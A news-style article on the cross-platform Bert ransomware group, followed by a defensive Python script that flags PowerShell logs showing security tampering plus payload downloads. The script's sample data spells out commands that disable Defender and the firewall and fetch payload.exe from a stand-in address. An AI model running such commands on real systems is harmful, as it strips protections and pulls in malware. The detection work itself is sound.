A new ransomware group called Bert has recently come into the spotlight for launching fast and widespread cyberattacks across the globe. First spotted in April 2025, this group has already targeted multiple industries, including healthcare, technology, and event services, across regions like Asia, Europe, and North America.
What makes Bert different is its ability to attack both Windows and Linux systems. It’s rare for ransomware to hit both platforms so effectively, but Bert has clearly been built with cross-platform attacks in mind. This means organizations running different operating systems aren’t safe just by securing one side.
Security researchers at Trend Micro were among the first to report on this new group. According to them, Bert is surprisingly effective despite using relatively simple code. Instead of relying on complex malware, it uses straightforward techniques, but it’s the speed and precision of its attacks that make it so dangerous.
On Windows, Bert uses PowerShell loaders to download the ransomware payload. Before encrypting any files, it takes steps to disable security features like Microsoft Defender and the Windows firewall. It also tries to escalate privileges to gain full control over the machine. Once it’s in control, it encrypts the victim’s data and demands ransom.
On Linux systems, the attack is even more aggressive. Bert can run up to 50 threads at once, meaning it encrypts files in parallel, making the process extremely fast. It even attempts to shut down VMware ESXi virtual machines, which are commonly used by businesses for cloud services. This prevents the system from being recovered easily, increasing the pressure on the victim to pay the ransom.
Security experts have also noticed that the ransomware is being downloaded from IP addresses linked to Russian hosting infrastructure, although no direct link to a specific threat actor has been confirmed yet. Trend Micro tracks this campaign under the codename “Water Pombero,” while other security firms have referred to it simply as Bert.
One worrying part is that Bert attacks don’t seem to follow a clear pattern. Victims are spread across various industries and regions, making it difficult to predict where the group will strike next. That randomness adds another layer of challenge for defenders.
Even though the malware itself is not highly sophisticated, the speed and coverage of Bert’s attacks make it very effective. In some cases, Linux servers were encrypted so quickly that security teams couldn’t even respond before it was too late. That’s a major warning sign for anyone relying on outdated defenses or slow detection systems.
Trend Micro recommends that organizations update their endpoint detection tools, monitor PowerShell activity, and watch out for suspicious traffic coming from untrusted IP addresses. Backup systems should also be tested regularly, especially in virtual environments, to make sure recovery is possible in case of an attack.
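One way to act on the PowerShell monitoring advice, as an added example that is not code from Trend Micro or from the Bert samples: a triage script over PowerShell script block logging text (Event ID 4104) that flags hosts where security-feature tampering and a payload download show up together. The patterns are generic assumptions rather than indicators from this campaign, and the host names, address and events are constructed sample data.

```python
import re
from collections import defaultdict

# Generic behaviour patterns (assumptions, not indicators taken from Bert samples).
PATTERNS = {
    "download": re.compile(
        r"Invoke-WebRequest|\biwr\b|Start-BitsTransfer|DownloadFile\(|DownloadString\(",
        re.I),
    "defender_off": re.compile(
        r"Set-MpPreference\b.*-Disable\w+\s+(\$true|1)\b", re.I),
    "firewall_off": re.compile(
        r"Set-NetFirewallProfile\b.*-Enabled\s+(False|\$false|0)\b"
        r"|netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
}

# Constructed sample records: (host, script block text from Event ID 4104).
SAMPLE_EVENTS = [
    ("ws-014", "Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("ws-014", "netsh advfirewall set allprofiles state off"),
    ("ws-014", "Invoke-WebRequest -Uri http://192.0.2.10/payload.exe -OutFile $env:TEMP\\p.exe"),
    ("ws-022", "Invoke-WebRequest -Uri https://example.com/tool.zip -OutFile tool.zip"),
    ("ws-031", "Set-MpPreference -DisableIOAVProtection 1"),
    ("srv-003", "Set-NetFirewallProfile -Profile Domain -Enabled True"),
]

def classify(script_text):
    """Return the set of behaviour tags that match one script block."""
    return {name for name, rx in PATTERNS.items() if rx.search(script_text)}

def triage(events):
    """Aggregate tags per host and assign a severity to suspicious hosts."""
    seen = defaultdict(set)
    for host, text in events:
        seen[host] |= classify(text)
    alerts = {}
    for host, tags in seen.items():
        tampering = tags & {"defender_off", "firewall_off"}
        if tampering and "download" in tags:
            alerts[host] = "high"    # tampering plus download on the same host
        elif tampering:
            alerts[host] = "medium"  # tampering alone still deserves review
    return alerts

if __name__ == "__main__":
    for host, severity in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, severity)
```

A download on its own (ws-022) and a command that enables the firewall (srv-003) raise no alert, which keeps routine administration out of the queue.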
If your company uses both Windows and Linux servers, you need to take this group seriously. Bert shows that cross-platform ransomware attacks are no longer rare: they’re here, and they’re moving fast.
For now, the best defense is a mix of timely patching, strong access control, and advanced monitoring tools that can detect suspicious behavior early. Once the encryption starts, it’s usually too late.
Bert may be using simple code, but it’s backed by smart strategy and serious intent. Cybercriminals are proving once again that speed and reach can be more dangerous than complexity.
Stay alert, and keep your security measures updated!